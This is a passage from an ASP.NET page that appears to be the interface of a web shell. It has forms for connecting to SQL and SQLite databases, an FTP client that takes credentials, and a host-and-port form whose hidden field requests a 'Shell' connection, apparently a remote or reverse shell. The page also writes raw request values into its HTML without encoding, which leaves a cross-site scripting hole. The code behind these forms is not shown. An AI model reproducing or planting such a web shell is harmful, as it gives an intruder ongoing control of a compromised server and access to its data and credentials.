- Password:<input type="text" name="pass" value="<%= Request.Form["pass"] + Request.QueryString["pass"]%>">
- Database:<input type="text" name="database" value="<%= Request.Form["database"] + Request.QueryString["database"]%>">
- <div id="FileNAMESQLite" style="display:none;">
- <br>SQLite Connection<br><br>
- DB File:<input type="text" name="filename" placeholder="C:/USER/RED/TEST.SQLITE" value="<%= Request.Form["filename"] + Request.QueryString["filename"]%>">
- Version: <select name="VersionSQLite">
- <option value=1>1.0</option>
- <option value=3>3.0</option>
- </select>
- </div>
- <input type="submit" value="Connect">
- </form></center>
- <%= SQLView %>
- </div></div>
- <div id="FTP" style="display:none;">
- <div class="footTable"><br><center>
- <form id="Form3" method="POST">
- Host:<input type="text" name="host" value="<%= Request.Form["host"] %>">
- Username:<input type="text" name="user" value="<%= Request.Form["user"] %>">
- Password:<input type="text" name="pass" value="<%= Request.Form["pass"] %>">
- SSL:<input type="checkbox" name="database" value="">
- <input type="hidden" name="FTP" value="true">
- <input type="hidden" name="command" value="">
- <input type="submit" value="Connect">
- </form></center>
- <%= OutputFTPBuffer + OutputFTPStatus %>
- </div></div>
- <div id="SRV" style="display:none;">
- <div class="footTable"><br><center>
- <form id="Form5" method="POST">
- Host:<input type="text" name="host" value="<%= Request.Form["host"] %>">
- Port:<input type="text" name="port" value="<%= Request.Form["port"] %>">
- <input type="hidden" name="a" value="Shell">
- <input type="submit" value="Connect">
- </form></center></div></div>
- </html>
- <% } %>